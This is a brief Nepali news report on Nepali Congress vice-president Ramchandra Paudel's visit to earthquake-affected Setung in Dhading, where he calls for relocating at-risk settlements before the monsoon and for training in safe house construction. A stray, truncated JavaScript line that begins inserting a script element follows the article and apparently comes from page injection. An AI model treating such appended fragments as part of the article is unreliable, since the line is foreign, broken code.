नेपाली काग्रेसका उपसभापति रामचन्द्र पौडेलले भूकम्पबाट जोखिम रहेका बस्तीमा रहेका जनतालाई तत्काल सुरक्षित स्थानमा स्थानान्तरण गरिनुपर्ने बताउनुभएको छ। बिहीबार भूकम्प प्रभावित क्षेत्रको अवलोकन गर्न धादिङको उत्तरी दुर्गम भेग सेतुङ पुग्नुभएका उपसभापति पौडेलले जनतालाई सुरक्षित स्थानमा राख्नुपर्ने सरकारको दायित्व रहेको भन्दै बर्षाअघि नै जोखिम रहेका बस्तीमा रहेका जनतालाई सुरक्षित स्थानमा स्थानान्तरण गरिनुपर्ने बताउनुभएको हो। उहाले बर्षा याममा पहिरोको खतरा हुने भन्दै त्यसअघि नै उपयुक्त व्यबस्था हुनुपर्ने उल्लेख गर्नुभयो। उहाले भूकम्प प्रतिरोधात्मक घर बनाउन सरकारले दिने रकमको सदुपयोग गर्नका लागी गाउ गाउमा तालिम दिई सुरक्षित घर निर्माण गर्न सिकाउनुपर्ने बेला आएको धारणा पनि राख्नुभयो। उहाले प्राकृतिक सौन्दर्य भएको स्थानमा होम स्टेको अवधारणा सहित बिकासको बाटो खुलाउनुपर्ने बताउनुभयो। सो अबसरमा उपसभापति पौडेलले सेतुङ स्थीत वडा नंवर नौ मा पुगी भूकम्पबाट क्षती भएका भौतिक संरचनाको निरिक्षण गर्नुभएको थियो भने पिडितहरुलाई जस्तापाता पनि बितरण गर्नुभएको थियो।

var d=document;var s=d.createElement(‘script’);